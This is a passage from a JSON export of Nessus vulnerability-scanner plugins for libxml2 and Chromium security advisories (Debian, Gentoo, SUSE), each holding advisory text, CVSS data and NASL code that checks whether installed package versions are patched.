But they don't necessarily have a physical representation in a document, so simply disallow them in XPointer ranges.\n\nCVE-2016-5131 The old code would invoke the broken xmlXPtrRangeToFunction. range-to isn't really a function but a special kind of location step. Remove this function and always handle range-to in the XPath code. The old xmlXPtrRangeToFunction could also be abused to trigger a use-after-free error with the potential for remote code execution.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 2.8.0+dfsg1-7+wheezy7.\n\nWe recommend that you upgrade your libxml2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-11-01T00:00:00", "type": "nessus", "title": "Debian DLA-691-1 : libxml2 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libxml2", "p-cpe:/a:debian:debian_linux:libxml2-dbg", "p-cpe:/a:debian:debian_linux:libxml2-dev", "p-cpe:/a:debian:debian_linux:libxml2-doc", "p-cpe:/a:debian:debian_linux:libxml2-utils", "p-cpe:/a:debian:debian_linux:libxml2-utils-dbg", "p-cpe:/a:debian:debian_linux:python-libxml2", "p-cpe:/a:debian:debian_linux:python-libxml2-dbg", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-691.NASL", "href": "https://www.tenable.com/plugins/nessus/94448", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-691-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94448);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-4658\", \"CVE-2016-5131\");\n\n script_name(english:\"Debian DLA-691-1 : libxml2 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2016-4658 Namespace nodes must be copied to avoid use-after-free\nerrors. But they don't necessarily have a physical representation in a\ndocument, so simply disallow them in XPointer ranges.\n\nCVE-2016-5131 The old code would invoke the broken\nxmlXPtrRangeToFunction. range-to isn't really a function but a special\nkind of location step. Remove this function and always handle range-to\nin the XPath code. The old xmlXPtrRangeToFunction could also be abused\nto trigger a use-after-free error with the potential for remote code\nexecution.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2.8.0+dfsg1-7+wheezy7.\n\nWe recommend that you upgrade your libxml2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/10/msg00048.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/libxml2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2-utils-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python-libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python-libxml2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2016/11/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libxml2\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-dbg\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-dev\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-doc\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-utils\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-utils-dbg\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python-libxml2\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python-libxml2-dbg\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:23:42", "description": "Several vulnerabilities were discovered in libxml2, a library providing support to read, modify and write XML and HTML files. 
A remote attacker could provide a specially crafted XML or HTML file that, when processed by an application using libxml2, would cause a denial-of-service against the application, or potentially, the execution of arbitrary code with the privileges of the user running the application.", "cvss3": {}, "published": "2016-12-27T00:00:00", "type": "nessus", "title": "Debian DSA-3744-1 : libxml2 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libxml2", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3744.NASL", "href": "https://www.tenable.com/plugins/nessus/96101", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3744. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96101);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-4658\", \"CVE-2016-5131\");\n script_xref(name:\"DSA\", value:\"3744\");\n\n script_name(english:\"Debian DSA-3744-1 : libxml2 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in libxml2, a library\nproviding support to read, modify and write XML and HTML files. 
A\nremote attacker could provide a specially crafted XML or HTML file\nthat, when processed by an application using libxml2, would cause a\ndenial-of-service against the application, or potentially, the\nexecution of arbitrary code with the privileges of the user running\nthe application.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=840553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=840554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/libxml2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3744\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libxml2 packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 2.9.1+dfsg1-5+deb8u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libxml2\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libxml2-dbg\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libxml2-dev\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libxml2-doc\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libxml2-utils\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libxml2-utils-dbg\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"python-libxml2\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"python-libxml2-dbg\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:07", "description": "The remote host is affected by the vulnerability described in GLSA-201610-09 (Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the Chromium web browser. 
Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2016-10-31T00:00:00", "type": "nessus", "title": "GLSA-201610-09 : Chromium: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137", "CVE-2016-5138", "CVE-2016-5139", "CVE-2016-5140", "CVE-2016-5141", "CVE-2016-5142", "CVE-2016-5143", "CVE-2016-5144", "CVE-2016-5145", "CVE-2016-5146", "CVE-2016-5147", "CVE-2016-5148", "CVE-2016-5149", "CVE-2016-5150", "CVE-2016-5151", "CVE-2016-5152", "CVE-2016-5153", "CVE-2016-5154", "CVE-2016-5155", "CVE-2016-5156", "CVE-2016-5157", "CVE-2016-5158", "CVE-2016-5159", "CVE-2016-5160", "CVE-2016-5161", "CVE-2016-5162", "CVE-2016-5163", "CVE-2016-5164", "CVE-2016-5165", "CVE-2016-5166", "CVE-2016-5167", "CVE-2016-5170", "CVE-2016-5171", "CVE-2016-5172", "CVE-2016-5173", "CVE-2016-5174", "CVE-2016-5175", "CVE-2016-5177", "CVE-2016-5178", "CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193", "CVE-2016-5194"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201610-09.NASL", "href": "https://www.tenable.com/plugins/nessus/94420", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 
201610-09.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94420);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\", \"CVE-2016-5138\", \"CVE-2016-5139\", \"CVE-2016-5140\", \"CVE-2016-5141\", \"CVE-2016-5142\", \"CVE-2016-5143\", \"CVE-2016-5144\", \"CVE-2016-5145\", \"CVE-2016-5146\", \"CVE-2016-5147\", \"CVE-2016-5148\", \"CVE-2016-5149\", \"CVE-2016-5150\", \"CVE-2016-5151\", \"CVE-2016-5152\", \"CVE-2016-5153\", \"CVE-2016-5154\", \"CVE-2016-5155\", \"CVE-2016-5156\", \"CVE-2016-5157\", \"CVE-2016-5158\", \"CVE-2016-5159\", \"CVE-2016-5160\", \"CVE-2016-5161\", \"CVE-2016-5162\", \"CVE-2016-5163\", \"CVE-2016-5164\", \"CVE-2016-5165\", \"CVE-2016-5166\", \"CVE-2016-5167\", \"CVE-2016-5170\", \"CVE-2016-5171\", \"CVE-2016-5172\", \"CVE-2016-5173\", \"CVE-2016-5174\", \"CVE-2016-5175\", \"CVE-2016-5177\", \"CVE-2016-5178\", \"CVE-2016-5181\", \"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5184\", \"CVE-2016-5185\", \"CVE-2016-5186\", \"CVE-2016-5187\", \"CVE-2016-5188\", \"CVE-2016-5189\", \"CVE-2016-5190\", \"CVE-2016-5191\", \"CVE-2016-5192\", \"CVE-2016-5193\", \"CVE-2016-5194\");\n script_xref(name:\"GLSA\", value:\"201610-09\");\n\n script_name(english:\"GLSA-201610-09 : Chromium: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more 
security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201610-09\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the Chromium web\n browser. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201610-09\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-54.0.2840.59'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 54.0.2840.59\"), vulnerable:make_list(\"lt 54.0.2840.59\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:00", "description": "This update for libxml2 fixes one issue. This security issue was fixed :\n\n - CVE-2017-15412: Prevent use after free when calling XPath extension functions that allowed remote attackers to cause DoS or potentially RCE (bsc#1077993)\n\n - CVE-2016-5131: Use-after-free vulnerability in libxml2 allowed remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function. (bsc#1078813)\n\n - CVE-2017-5130: Fixed a potential remote buffer overflow in function xmlMemoryStrdup() (bsc#1078806)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-02-09T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : libxml2 (SUSE-SU-2018:0401-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2017-15412", "CVE-2017-5130"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libxml2", "p-cpe:/a:novell:suse_linux:libxml2-2", "p-cpe:/a:novell:suse_linux:libxml2-2-debuginfo", "p-cpe:/a:novell:suse_linux:libxml2-debugsource", "p-cpe:/a:novell:suse_linux:libxml2-tools", "p-cpe:/a:novell:suse_linux:libxml2-tools-debuginfo", "p-cpe:/a:novell:suse_linux:python-libxml2", "p-cpe:/a:novell:suse_linux:python-libxml2-debuginfo", "p-cpe:/a:novell:suse_linux:python-libxml2-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2018-0401-1.NASL", "href": "https://www.tenable.com/plugins/nessus/106708", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0401-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106708);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2016-5131\", \"CVE-2017-15412\", \"CVE-2017-5130\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : libxml2 (SUSE-SU-2018:0401-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for libxml2 fixes one issue. 
This security issue was \nfixed :\n\n - CVE-2017-15412: Prevent use after free when calling\n XPath extension functions that allowed remote attackers\n to cause DoS or potentially RCE (bsc#1077993)\n\n - CVE-2016-5131: Use-after-free vulnerability in libxml2\n allowed remote attackers to cause a denial of service or\n possibly have unspecified other impact via vectors\n related to the XPointer range-to function. (bsc#1078813)\n\n - CVE-2017-5130: Fixed a potential remote buffer overflow\n in function xmlMemoryStrdup() (bsc#1078806)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1078806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1078813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5131/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-15412/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5130/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180401-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?47defebc\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-276=1\n\nSUSE Linux Enterprise Software 
Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2018-276=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2018-276=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-276=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-276=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-276=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2018-276=1\n\nSUSE CaaS Platform ALL:zypper in -t patch SUSE-CAASP-ALL-2018-276=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2018-276=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:python-libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
